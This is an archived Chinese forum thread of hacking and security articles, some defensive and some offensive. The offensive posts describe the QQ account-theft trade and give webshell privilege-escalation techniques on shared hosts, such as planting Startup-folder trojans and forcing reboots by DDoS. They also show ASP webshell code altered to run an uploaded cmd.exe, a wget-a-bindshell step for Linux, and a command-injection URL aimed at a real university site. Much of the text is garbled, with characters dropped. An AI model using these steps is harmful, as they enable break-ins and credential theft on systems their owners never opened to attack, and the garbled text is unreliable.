系统之家's Archiver
主动出击教你夺回被人盗走的QQ号码(每日2篇-003)
marioshen
发表于 2008-5-17 15:12
QQ黑幕(每日2篇-046)
在当今网络盛行的时代。QQ成为了不可缺少的即时通讯工具。
然而随着黑客的风靡,盗取他人的QQ号码和利用他人宽带帐号密码开通QQ各项服务
成为了黑坛客们的相当感兴趣的话题。因为他们可以用此来获取利益。。
今天我就给大家揭开这个黑幕,
看看黑客是怎么盗取他人QQ号码和利用他人宽带帐号密码开通QQ各项服务
来获取非法利益的。。
一。盗Q篇 相信大家不少有Q被盗的经历吧,那么黑客是怎么盗取别人QQ号码的呢。。 首先要说的盗Q的木马,现在网上比较流行的盗Q木马有:Q冲击波,盗Q黑侠,啊拉Q大盗,上兴盗Q王 等等一些个人修改的和私藏的版本。这些木马功能相当全面,可以获得你QQ上的各种信息,如:等级, 积分,QB,有无密码保护,登陆IP,等。它可以通过信箱和ASP收信。
以下是几个版本的盗Q木马的界面。
这些盗Q的木马更新频率也很高。TX刚采取了什么措施,下面就会产生相应的对策。
生成的木马经过免杀处理以后通过各种方式传播,常见的有BT挂马,百度贴吧,迅雷,酷狗挂马, 这主要是利用了P2P软件阻援共享的原理。。最恐怖的是网页挂马,在你浏览网页的时候就不知觉的中招了。 有些安全性底有漏洞的大站,就被他们挂了马,ASP收信是挂网页木马采用的主要方式.他具有收信快 容量大等特点帐号和密码被保存在跟收信ASP文件同目录下的一个TXT文件中,
这个文件就是所说的Q信封。。收信的数量和被挂马的站访问量有关系。黑客们盗取了这么多的Q号有什么用呢? 可怜的是中国有这么多人喜欢用这聊天工具,并且痴迷于TX的各种业务及游戏。。 这个Q信封可谓是个“宝贝”。。一般一封信是1W个Q号码。可以卖到150RMB左右。。 买了这些信封的人,用工具扫出里面有QB和无密码保护的号码。。这就是所谓的洗信。常见的工具有: JQQ,PQQ,VQQ,DQQ。名字不同但大概功能相似。这种软件一般都为收费版本。价格由几十到几百不等 有包月的。有终身的。。可以批量查询QB,密码保护。积分等信息。
QB大于10个的都被赠送了他人业务。 一个业务为2。5-3。5元左右。。查询软件来不及升级的时候,价格就会稍微上涨。。 然而那些不足10个QB的Q号码将被赠送Q秀和转成游戏币等。。那些密码保护的号码将被出无售。。 一个5位的无保号码可以卖到上千元。一般6位的也在200-400元不等。。7位的10-50左右。。 当前有此交易的论坛最牛的是安兴论坛,其次应该是Q缘休闲论坛。。 看见没有。。自己被盗的Q号码经过这么多的次的处理,变成了黑客手中的人民币。。 忧郁国民这么喜欢QQ。。
二。刷业务篇 由于电信宽带用户可以直接登陆互联星空主页去开通各种Q的业务和对Q帐户冲值,这给利用代理盗用 他人宽带帐号密码开业务人提供了便利之门,虽然互联星空一次又一次的升级,但始终不能拒黑客与千里 之外。。他们利用一些端口扫描工具和代理测试工具疯狂的盗用他人帐号。不觉叫人痛恨入骨。一般淘宝 易趣上那些出售服务的都是非法途径得来的,你想谁会自己花10元开个服务,卖你2,3元。。
marioshen
发表于 2008-5-18 13:01
防之全面分析黑客常用九种攻击方法(每日2篇-047) 许多上网的用户对网络安全可能抱着无所谓的态度,认为最多不过是被“黑客”盗用账号,他们往往会认为“安全”只是针对那些大中型企事业单位的,而且黑客与自己无怨无仇, 干嘛要攻击自己呢?其实,在一无法纪二无制度的虚拟网络世界中,现实生活中所有的阴险和卑鄙都表现得一览无余,在这样的信息时代里,几乎每个人都面临着安全威胁,都有必要对网络安全有所了解,并能够处理一些安全方面的问题,那些平时不注意安全的人,往往在受到安全方面的攻击时,付出惨重的代价时才会后悔不已。同志们要记住啊!防人之心不可无呀!
为了把损失降低到最低限度,我们一定要有安全观念,并掌握一定的安全防范措施,禁绝让黑客无任何机会可趁。下面我们就来研究一下那些黑客是如何找到你计算机中的安全漏洞的,只有了解了他们的攻击手段,我们才能采取准确的对策对付这些黑客。
1、获取口令
这又有三种方法:一是通过网络***非法得到用户口令,这类方法有一定的局限性,但危害性极大,***者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种方法不受网段限制,但黑客要有足够的耐心和时间;三是在获得一个服务器上的用户口令文件(此文件成为Shadow文件)后,用暴力破解程序破解用户口令,该方法的使用前提是黑客获得口令的Shadow文件。此方法在所有方法中危害最大,因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器,而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码,尤其对那些弱智用户(指口令安全系数极低的用户,如某用户账号为zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内,甚至几十秒内就可以将其干掉。
2、放置特洛伊木马程序
特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知黑客,来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。
3、WWW的欺骗技术
在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑***务器发出请求,那么黑客就可以达到欺骗的目的了。
4、电子邮件攻击
电子邮件攻击主要表现为两种方式:一是电子邮件轰炸和电子邮件“滚雪球”,也就是通常所说的邮件炸弹,指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器操作系统带来危险,甚至瘫痪;二是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序(据笔者所知,某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务,这为黑客成功地利用该方法提供了可乘之机),这类欺骗只要用户提高警惕,一般危害性不是太大。
5、通过一个节点来攻击其他节点
黑客在突破一台主机后,往往以此主机作为根据地,攻击其他主机(以隐蔽其入侵路径,避免留下蛛丝马迹)。他们可以使用网络***方法,尝试攻破同一网络内的其他主机;也可以通过IP欺骗和主机信任关系,攻击其他主机。这类攻击很狡猾,但由于某些技术很难掌握,如IP欺骗,因此较少被黑客使用。
6、网络***
网络***是主机的一种工作模式,在这种模式下,主机可以接受到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些网络***工具,例如NetXray for windows 95/98/nt, iffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络***获得的用户帐号和口令具有一定的局限性,但***者往往能够获得其所在网段的所有用户帐号及口令。
7、寻找系统漏洞
许多系统都有这样那样的安全漏洞(Bugs),其中某些是操作系统或应用软件本身具有的,如Sendmail漏洞,win98中的共享目录密码验证漏洞和IE5漏洞等,这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏,除非你将网线拔掉;还有一些漏洞是由于系统管理员配置错误引起的,如在网络文件系统中,将目录和文件以可写的方式调出,将未加Shadow的用户密码文件以明码方式存放在某一目录下,这都会给黑客带来可乘之机,应及时加以修正。
8、利用帐号进行攻击
有的黑客会利用操作系统提供的缺省账户和密码进行攻击,例如许多UNIX主机都有FTP和Guest等缺省账户(其密码和账户名同名),有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息,不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕,将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。
9、偷取特权
利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击,前者可使黑客非法获得对用户机器的完全控制权,后者可使黑客获得超级用户的权限,从而拥有对整个网络的绝对控制权。这种攻击手段,一旦奏效,危害性极大。
marioshen
发表于 2008-5-18 13:04
We hell突破虚拟机权限的一般思路(每日2篇-048)
注入的发展给we hell的研究提供了孕育的环境,a 系统的上传漏洞,尤其是使用广泛的dv 的上传漏洞给we hell快速发展,另外,下载默认数据库或备份数据库,然后利用后台的数据库备份得到we hell也是非常重要的入侵的手段,尤其是dv 数据库的表dv_logs的设置,简直让md5形同虚设。
We hell权限的提升的研究,一下子成为摆在众多web攻击爱好者的难题。最近经常看到有人问,得到了we hell,可是由于种种限制,不能得到权限,或者达不到旁注的目的,请求办法。
记得一位牛人说的话:只要有we hell,我就能获得管理员权限。
鄙人没有这么强,我只是根据我实际的入侵经验给大家谈谈虚拟主机的权限,错误与不足之处请大家指出,欢迎来我的网站和我讨论([url]http://www.918x.com[/url])。本文部分得到岁月联盟HaK_BaN的帮助,在此表示感谢。
在入侵中以下几种情况不属于我们探讨的范围。
可以跳转到任意目录并可写可执行;可以修改C:\Program Files\serv-u\ServUDaemon.ini;可以成功运行cscript C:\Inetpub\AdminScripts\adsutil.v get w3svc/i roce isapia quot;提升权限的。可以成功用绑定木马的类似程序替换相关程序或服务。
好了,这里我们使用的木马主要是老兵的a 管理6.0,辅助的是砍客的C/S ASP木马。(这两个木马配合使用效果要比海洋好。)
一般虚拟主机是这样设置的:系统的每个分区禁止everyone访问的。每个网站用单独的iis用户,例如,iis_[url]www.target.com[/url]。一般虚拟主机设置这个用户是隶属guest组的,权限很低的。只能访问特定的文件夹。这就导致了网站目录不能跳转,你只能访问本网站所在文件夹。
但是我要强调的是,虽然禁止了C盘的everyone访问,但是大多数系统的C盘子文件夹没有继承父文件夹的限制,于是,我们可以手动的访问(注意:自己添加路径再转)C:\Documents and Settings和C:\Program Files,这个对入侵提升权限非常重要。
我们可以访问C:\Program Files\serv-u\ServUDaemon.ini,但是serv-u的利用太广泛了,一般的管理员都知道设置serv-u文件夹的权限,一般是不能修改的。
我们还可以手动访问并下载C:\Documents and Settings\All Users\A lication Data\Symantec\pcAnywhere下的*.cif文件,进而破解出pcAnywhere的用户名和密码来远程登陆。也可能出现管理员登录后我们就上不去,管理员离开后会把桌面锁定。这里老兵([url]http://www.gxgl.com[/url])给我们提供一个解决思路([url]http://www.918x.com/showart.a ?art_id=47&am cat_id=5[/url])。
如果手动可以访问c:\php,c:\prel等,说明我们可以使用php,cgi等的we hell。具体这期《黑客X档案》里angel的文章就很成功地突破了限制,我就不多重复。
给angel补充一点:如果能看见C:\Program Files\Java Web Start\,可以试试用j 的we hell,我遇见过一次,但是权限也不是很大。
用砍客的木马,我们可以看到有serv-u的运行,并且知道他的绝对路径,很自然可以想到serv-u的权限的提升。这里就要涉及到三点:1,上传溢出程序。2,cmd的可用。3,iis单用户要有运行程序的权限。对于第一点,老兵的木马涉及到Scripting .Dictionary(数据流上传辅助组件),Adodb .Stream(数据流上传组件),SoftArtisa .FileUp(SA-FileUp 文件上传组件),LyfUpload.UploadFile(刘云峰文件上传组件),Persits.Upload.1(ASPUpload 文件上传组件)一般来说是可以上传,没有问题的。(如果还不行,我推荐使用littlepigp无组件上传,hackbase.com有下的。)对于第二点,wscript.shell组件的使用非常重要,当出现了拒绝访问。 ,我们则可以知道对方的cmd不允许访问,这样我们可以上传一个cmd.exe来达到我们使用cmd的目的。但是当我们看见ActiveX 部件不能创建对象,说明我们完全不能使用cmd,入侵也就陷入了困境。对于第3点,则基本没有办法,例外的还是FTA分区的利用,权限再低,在FTA分区还是可以轻松运行程序的。
我们经常讲黑客要有发散性思维,不能总是思维定势。其他的一些突破方法,无非是基于对主机其他内容的利用来达到的。比如,有人利用flashfxp里的配置文件来获得一些密码基本信息。我们同样可以下载CuteFTP 的配置文件来替换本地文件也能达到相同的目的。
再稍微谈一下那篇将a 木马权限提升到最高里的方法,一般情况下,在我们可以使用cmd的前提下,虽然服务器支持FSO,但我们是没有访问C:\Inetpub\的权限的,这样我们自然不能用cscript C:\Inetpub\AdminScripts\adsutil.v get w3svc/i roce isapia quot;这句来提升权限的。如图:
Click to Open in New Window
如果权限设置得太严格,唯一的通用的办法就是在c:\Documents and Settings\All Users\「开始」菜单\程序\启动写入bat,v 等木马。等主机重启或者你ddos逼它重启,来达到权限提升的目的。
虚拟主机的设置有的是十分变态,比如:有些主机允许上传,但是不允许修改和删除;有些主机的Program Files被改为很变态的名字;有些主机的serv-u竟然是隶属guest组的用户来运行的;有些主机的杀毒做得十分惊人,n重加密过的种种木马难逃杀手,BT到了极点。
marioshen
发表于 2008-5-19 17:01
无命令提示的权限提升(每日2篇-049)
有很多朋友问他得到了一个WEBSHELL,但是想用命令提示查看用户信息什么的,但是很多主机限制了执行命令,所以很多WEBSHELL就不能失去了很大的功能......我就以ASP站长助手6.0为例把它上传到一个禁止执行的虚拟主机,然后上传一个CMD.exe,然后调用你上传的CMD来执行命令......
本来想搞图文教程的,但感觉太简单,文字就可以说明清楚了
1.打开ASP站长助手6.0点击命令提示符,显示没有权限
2.用ASP站长助手6.0上传功能上传一个CMD.exe(在WIN\system32\cmd.exe)到你的WEBSHELL目录(其它目录也行,把上传以后的CMD.exe绝对路径COPY出来)
3.修改你的we hell找到调用CMD.exe的代码
Function CmdShell()
If Request(cmd) Then
DefCmd = Request(cmd)
DefCmd = Dir " am Se ion(FolderPath)
?SI=SI&am erver.createobject(wscript.shell).exec(cmd.exe /c " am DefCmd).stdout.readall
?SI=SI&am Chr(13)Rar命令行压缩示例:c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar d:\web\test\web1
Re o e.Write SI
End Function
修改成以下载的代码
Function CmdShell()
If Request(cmd) Then
DefCmd = Request(cmd)
DefCmd = Dir " am Se ion(FolderPath)
?SI=SI&am erver.createobject(wscript.shell).exec(你想上传的cmd.exe绝对路径 /c " am DefCmd).stdout.readall
?SI=SI&am Chr(13)Rar命令行压缩示例:c:\progra~1\winrar\rar.exe a d:\web\test\web1.rar d:\web\test\web1
Re o e.Write SI
End Function
为了大家看得清楚把要修改的提出来就可以
原来的:
SI=SI&am erver.createobject(wscript.shell).exec(cmd.exe /c " am DefCmd).stdout.readall
修改成:
SI=SI&am erver.createobject(wscript.shell).exec(你想上传的cmd.exe绝对路径 /c " am DefCmd).stdout.readall
比如你上伟到的目录是D:\web\www\cmd.exe那么就修改成:
SI=SI&am erver.createobject(wscript.shell).exec(D:\web\www\cmd.exe /c " am DefCmd).stdout.readall
这样你的WEBSHELL中的命令提示符就可以用了......
we hell 提升 for linux
在zone-h得到了***,他们是这样干的
用wget把bindshell下载到/tmp/目录下
或者再/etc/inetd.conf可写的情况下直接开一个交互的shell
然后用gcc编译
[url]http://cgiserver.sogang.ac.kr/~gsviscom/cgi-bin/technote/main.cgi/shop.pdf?down_num=5466654&am oard=rebarz99&am command=down_load&am filename=rb9.txt[/url]|ls%20-al|
ls -al显示文件
||中间的是显示的命令
很简单的办法是得到用户
最基本的办法是得到用户列表然后用流光跑密码
.... etc/pa wd
marioshen
发表于 2008-5-19 17:02
防止Acce 数据库被下载的9种方法(每日2篇-050) 1.发挥你的想象力 修改数据库文件名不用说,这是最最偷懒的方法,但是若攻击者通过第三方途径获得了数据库的路径),就玩完了。比如说攻击者本来只能拿到list权 ,结果意外看到了数据库路径,就可以冠冕堂皇地把数据库下载回去研究了。另外,数据文件通常大小都比较大,起再隐蔽的文件名都瞒 不了人。故保密性为最低。
2.数据库名后缀改为ASA、ASP等
此法须配合一些要进行一些设置,否则就会出现本文开头的那种情况
(1)二进制字段添加(此招我还没有炼成-_-+)。
(2) 在这个文件中加入%或%,IIS就会按ASP语法来解析,然后就会报告500错误,自然不能下载了。可是 如果只是简单的在数据库的文本或者备注字段加入%是没用的,因为ACCESS会对其中的内容进行处理,在数据库里他会以 %的形式存在,无效!正确的方法是将 %存入OLE对象字段里,这样我们的目的就能达到了。&am p;作方法:首先,用notepad新建一个内容为 % 的 文本文件,随便起个名字存档。
接着,用Acce 打开您的数据库文件,新建一个表,随便起个名字,在表中添加一个OLE对象的字段,然后添加一个记录, 插入之前建立的文本文件,如果操作正确的话,应该可以看到一个新的名为数据包"的记录。即可
3.数据库名前加#只需要把数据库文件前名加上#、然后修改数据库连接文件(如co .a )中的数据库地址。原理是下载的时候只能识别&am ;#号前名的部分,对于后面的自动去掉,比如你要下载:[url]http://www.pcdigest.com/date/#[/url] 123.mdb(假设存在的话)。无论是 IE还是FLASHGET等下到的都是[url]http://www.test.com/dat[/url] e/index.htm(index.a 、 default.j 等你在IIS设置的首页文档)
另外在数据库文件名中保留一些空格也起到类似作用,由于HTTP协议对地址解析的特殊性,空格会被编码为%,如http ://www.test.com/date/123 ;456.mdb,下载的时http: //www. test.com/date/123 %456.mdb.而我们的目录就根本没有123%456.mdb这个文件,所 以下载也是无效的这样的修改后,即使你暴露了数据库地址,一般情况下别人也是无法下载!
4.加密数据库首先在选取工具- 安全-加密/解密数据库,选取数据库(如:employer.mdb),然后接确定,接 着会出现数据库加密后另存为的窗口,存为: employer1.mdb.接着employer.mdb就会被编码,然后存为 employer1.mdb……要注意的是,以上的动作并不是对数据库设置密码,而只是对数据库文件加以编码,目的是为了防止他 人使用别的工具来查看数据库文件的内容。
接下来我们为数据库加密,首先以打开经过编码了的 e mployer1.mdb,在打开时,选择独占方式。然后选取功能表的工具-安全-设置数据库密码,&am ;接着输入密码即可。这样即使他人得到了employer1.mdb文件,没有密码他是无法看到 emplo yer1.mdb的。
marioshen
发表于 2008-5-20 15:33
如何一次性删除木马(每日2篇-051)
问:现在的木马种类繁多,而且有些木马十分顽固,根本没法杀干净。有什么方法能有效的防止木马和清除它们的方法吗?
答:什么是木马
你所说的木马,也就是一种能潜伏在受害者计算机里,并且秘密开放一个甚至多个数据传输通道的远程控制程序,一般由两部分组成:客户端(Client)和服务器端(Server),客户端也称为控制端。
木马的传播感染其实指的就是服务器端,入侵者必须通过各种手段把服务器端程序传送给受害者运行,才能达到木马传播的目的。当服务器端被受害者计算机执行时,便将自身复制到系统目录,并把运行代码加入系统启动时会自动调用的区域里,借以达到跟随系统启动而运行,这一区域通常称为“启动项”。当木马完成这部分操作后,便进入潜伏期——偷偷开放系统端口,等待入侵者连接。
阻止木马运行——查杀更彻底
任何操作系统都会在启动时自动运行一些程序,用以初始化系统环境或额外功能等,这些被允许跟随系统启动而运行的程序被放置在专门的区域里供系统启动时加载运行,这些区域就是“启动项”,不同的系统提供的“启动项”数量也不同,对于Win9x来说,它提供了至少5个“启动项”:DOS环境下的Autoexec.bat、Config.sys,Windows环境下的“启动”程序组、注册表的2个Run项和1个RunServices项,分别是:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
到了2000/XP系统时代,DOS环境被取消,却新增了一种称之为“服务”的启动区域,注册表也在保持原项目不变的基础上增加了2个“启动项”:
项目 键名
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows A Init_DLLs
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run
这么多的启动入口,木马自然不会放过,于是我们经常在一些计算机的启动项里发现陌生的程序名,这时候就只能交由你或者病毒防火墙来判断了,毕竟系统自身会在这里放置一些必要的初始化程序,还有一些正常工具,包括病毒防火墙和网络防火墙,它们也必须通过启动项来实现跟随系统启动。
此外还有一种不需要通过启动项也能达到跟随系统启动的卑劣手法,那就是“系统路径遍历优先级欺骗”,Windows系统搜寻一个不带路径信息的文件时遵循一种“从外到里”的规则,它会由系统所在盘符的根目录开始向系统目录深处递进查找,而不是精确定位的,这就意味着,如果有两个同样名称的文件分别放在C:\和C:\Windows下,Windows会执行C:\下的程序,而不是C:\Windows下的。这样的搜寻逻辑就给入侵者提供了一个机会,木马可以把自己改为系统启动时必定会调用的某个文件名,并复制到比原文件要浅一级以上的目录里,Windows就会想当然的执行了木马程序,系统的噩梦就此拉开序幕。这种手法常被用于“internat.exe”,因为无论哪个Windows版本的启动项里,它都是没有设置路径的。
要提防这种占用启动项而做到自动运行的木马,用户必须了解自己机器里所有正常的启动项信息,才能知道木马有没有混进来。至于利用系统路径漏洞的木马,则只能靠用户自己的细心了。
根除木马——文件并联型木马的查杀
某些用户经常会很郁闷,自己明明已经删除了木马文件和相应的启动项,可是不知道什么时候它自己又原封不动的回来了,这还不算,更悲惨的是有时候杀掉某个木马后,系统也出了故障:所有应用程序都打不开了。这时候,如果用户对计算机技术的了解仅限于使用杀毒软件,那可只能哭哭啼啼的重装系统了!
为什么会这样?难道这种木马还恶意修改了系统核心?其实***很简单,因为这种木马修改了应用程序(EXE文件)的并联方式。
什么是“并联方式”呢?在Windows系统里,文件的打开操作是通过注册表内相应键值指定的应用程序来执行的,这个部分位于注册表的“HKEY_CLASSES_ROOT”主键内,当系统收到一个文件名请求时,会以它的后缀名为依据在这里识别文件类型,进而调用相应的程序打开。而应用程序自身也被视为一个文件,它也属于一种文件类型,同样可以用其他方式开启,只不过Windows设置它的调用程序为“\%1\ %*”,让系统内核理解为“可执行请求”,它就会为使用这种打开方式的文件创建进程,最终文件就被加载执行了,如果有另外的程序更改了这个键值,Windows就会调用那个指定的文件来开启它。一些木马程序把EXE后缀名对应的exefile类型的“打开方式”改成了“木马程序 \%1\ %*”,运行程序时系统就会先为“木马程序”创建进程,把紧跟着的文件名作为参数传递给它执行,于是在我们看来程序被正常启动了。因为木马程序被作为所有EXE文件的调用程序,使得它可以长期驻留内存,每次都能恢复自身文件,所以在一般用户看来,这个木马就做到了“永生不死”。然而一旦木马程序被删除,Windows就会找不到相应的调用程序,于是正常程序就无法执行了,这就是所谓的“所有程序都无法运行”的情况来源,并不是木马更改了系统核心,更没必要因此重装整个系统。
根除这种木马的最简单方法只需要查看EXE文件的打开方式被指向了什么程序,立即停止这个程序的进程,如果它还产生了其他木马文件的话,也一起停止,然后在保持注册表编辑器开启着的情况下(否则你的所有程序都会打不开了)删除掉所有木马文件,把exefile的“打开方式”项(HKEY_CLASSES_ROOT\exefile\shell\open\command)改回原来的“”%1” %*”即可。
如果删除木马前忘记把并联方式改回来,就会发现程序打不开了,这时候不要着急,如果你是Win9x用户,请使用“外壳替换大法”:重启后按F8进入启动菜单选择MS-DOS模式,把Explorer.exe随便改个名字,再把REGEDIT.EXE改名为Explorer.exe,再次重启后会发现进入Windows只剩下一个注册表编辑器了,赶快把并联方式改回来吧!重启后别忘记恢复以前的Explorer.exe。
对于Win2000/XP用户而言,这个操作更简单了,只要在开机时按F8进入启动菜单,选“命令提示符的安全模式”,系统就会自动调用命令提示符界面作为外壳,直接在里面输入REGEDIT即可打开注册表编辑器!XP用户甚至不需要重启,直接在“打开方式”里浏览到CMD.EXE就能打开“命令提示符”界面运行注册表编辑器REGEDIT.EXE了。
marioshen
发表于 2008-5-20 15:33
网络安全重在日常防护(每日2篇-052)
近期读了一些关于网络入侵的文章,感觉到增强网络安全是一项日常性的工作,
并不是说网络设备、服务器配置好了就绝对安全了,操作系统和一些软件的漏洞是不断被发现的,
比如冲击波、震荡波病毒就是利用系统漏洞,同样利用这些漏洞可以溢出得到系统管理员权限,
server-U的提升权限漏洞也可以被利用。在这些漏洞未被发现前,我们觉得系统是安全的,
其实还是不安全的,也许漏洞在未公布前已经被部分hacker 所知,
也就是说系统和应用软件我们不知道还会存在什么漏洞,那么日常性的防护就显得尤为必要。 一、做好基础性的防护工作,服务器***干净的操作系统,不需要的服务一律不装,多一项就多一种被入侵的可能性,打齐所有补丁,
微软的操作系统当然推荐WIN2K3,性能和安全性比WIN2K都有所增强,选择一款优秀的杀毒软件,至少能对付大多数木马和病毒 的,
***好杀毒软件,设置好时间段自动上网升级,设置好帐号和权限,设置的用户尽可能的少,对用户的权限尽可能的小,密码设置要足够强壮。
对于MSSQL,也要设置分配好权限,按照最小原则分配。最好禁用xp_cmdshell。有的网络有硬件防火墙,
当 然好,但仅仅依靠硬件防火墙,并不能阻挡hacker的攻击,利用反向连接型的木马和其他的办法还是可以突破硬件防火墙的阻挡。
WIN2K3系统自带的防火墙功能还不够强大,建议打开,但还需要***一款优秀的软件防火墙保护系统,我一般习惯用ZA,
论坛有 很多教程了。对于对互联网提供服务的服务器,软件防火墙的安全级别设置为最高,然后仅仅开放提供服务的端口,
其他一律关闭,对于服务器上所有要访问网络的程序,现在防火墙都会给予提示是否允许访问,根据情况对于系统升级,
杀毒软件自动升级等有必要访问外网 的程序加到防火墙允许访问列表。那么那些反向连接型的木马就会被防火墙阻止,
这样至少系统多了一些安全性的保障,给hacker入侵就多一些阻碍。网络上有很多基础型的防护资料,大家可以查查相关服务器安全配置方面的资料。 二、修补所有已知的漏洞,未知的就没法修补了,所以要养成良好的习惯,就是要经常去关注。
了解自己的系统,知彼知己,百战百胜。所有补丁是否打齐,比如m ql,server-U,论坛程序是否还有漏洞,
每一个漏洞几乎都是致命的,系统开了哪些服务,开了哪些端口,目前开的这些服务中有没有漏洞可以被黑客应用,
经常性的了解当前黑客攻击的手法和可以被利用的漏洞,检查自己的系统中是否存在这些漏洞。比如SQL注入漏洞,
很多网站 都是因为这个服务器被入侵,如果我们作为网站或者服务器的管理者,我们就应该经常去关注这些技术,
自己经常可以用一些安全性扫描工具检测检测,比如X- scan, amp, i,PHP注入检测工具等,
或者是用当前比较流行的hacker入侵工具检测自己的系统是否存在漏洞,这得针对自己的系统开的服务去检测,
发现漏洞及时修补。网络管理人员不可能对每一方面都很精通,可以请精通的人员帮助检测,当然对于公司来说,如果 系统非常重要,
应该请专业的安全机构来检测,毕竟他们比较专业。 三、服务器的远程管理,相信很多人都喜欢用server自带的远程终端,我也喜欢,简洁速度快。但对于外网开放的服务器来说,
就要谨慎了,要想到自己能用,那么这个端口就对外开放了,黑客也可以用,所以也要做一些防护了。
一就是用***策略来限制访问者,给 TS配置安全***,客户端访问需要安全***。二就是限制能够访问服务器终端服务的IP地址。
三是可以在前两者的基础上再把默认的3389端口改一下。当然也可以用其他的远程管理软件,pcanywhere也不错。 四、另外一个容易忽视的环节是网络容易被薄弱的环节所攻破,服务器配置安全了,但网络存在其他不安全的机器,
还是容易被攻破,“千里之堤,溃于蚁穴 ”。利用被控制的网络中的一台机器做跳板,可以对整个网络进行渗透攻击,
所以安全的配置网络中的机器也很必要。说到跳板攻击,水平稍高一点的hacker攻击一般都会隐藏其真实IP,
所以说如果被入侵了,再去追查的话是很难成功的。Hacker利用控制的 肉鸡,肉鸡一般都是有漏洞被完全控制的计算机,
***了一些代理程序或者黑客软件,比如DDOS攻击软件,跳板程序等,这些肉鸡就成为黑客的跳板,从而隐藏了真实IP。
五、最后想说的是即使大家经过层层防护,系统也未必就绝对安全了,但已经可以抵挡一般的hacker的攻击了。连老大微软都不能说他的系统绝对安全。
系统即使只开放80端口, 如果服务方面存在漏洞的话,水平高的hacker还是可以钻进去,所以最关键的一点我认为还是关注最新漏洞,
发现就要及时修补。“攻就是防,防就是攻” ,这个观点我比较赞同,我说的意思并不是要去攻击别人的网站,而是要了解别人的攻击手法,
更好的做好防护。比如不知道什么叫克隆管理员账号,也许你的机器已经被入侵并被克隆了账号,可能你还不知道呢?如果知道有这种手法,
也许就会更注意这方面。自己的网站 如果真的做得无漏洞可钻,hacker也就无可奈何了。
发表于 2008-5-20 16:23
受益匪浅,但是实际还是用得很少。
marioshen
发表于 2008-5-23 10:16
防止黑客入侵ADSL一些技巧(每日2篇-053)
随着各地ADSL网络的蓬勃发展,实现永久连接、随时在线已不再是遥远的梦,但是,我们必须明白,永久连入Internet同样也意味着遭受入侵的可能性大大增加。知己知彼,方能百战不殆,让我们了解一下黑客入侵ADSL用户的方法和防范手段吧。
黑客入侵ADSL用户的方法
在很多地方都是包月制的,这样的话,黑客就可以用更长的时间进行端口以及漏洞的扫描,甚至采用在线暴力破解的方法盗取密码,或者使用嗅探工具守株待兔般等待对方自动把用户名和密码送上门。
要完成一次成功的网络攻击,一般有以下几步。第一步就是要收集目标的各种信息,为了对目标进行彻底分析,必须尽可能收集攻击目标的大量有效信息,以便最后分析得到目标的漏洞列表。分析结果包括:操作系统类型,操作系统的版本,打开的服务,打开服务的版本,网络拓扑结构,网络设备,防火墙。
黑客扫描使用的主要是TCP/IP堆栈指纹的方法。实现的手段主要是三种:
1.TCP ISN采样:寻找初始化序列规定长度与特定的OS是否匹配。
2.FIN探测:发送一个FIN包(或者是任何没有ACK或SYN标记的包)到目标的一个开放的端口,然后等待回应。许多系统会返回一个RESET(复位标记)。
3.利用BOGUS标记:通过发送一个SYN包,它含有没有定义的TCP标记的TCP头,利用系统对标记的不同反应,可以区分一些操作系统。
4.利用TCP的初始化窗口:只是简单地检查返回包里包含的窗口长度,根据大小来唯一确认各个操作系统。
扫描技术虽然很多,原理却很简单。这里简单介绍一下扫描工具Nmap(Network ma er)。这号称是目前最好的扫描工具,功能强大,用途多样,支持多种平台,灵活机动,方便易用,携带性强,留迹极少;不但能扫描出TCP/UDP端口,还能用于扫描/侦测大型网络。
注意这里使用了一些真实的域名,这样可以让扫描行为看起来更具体。你可以用自己网络里的名称代替其中的addre es/names。你最好在取得允许后再进行扫描,否则后果可要你自己承担哦。
nmap -v target.example.com
这个命令对target.example.com上所有的保留TCP端口做了一次扫描,-v表示用详细模式。
nmap -sS -O target.example.com/24
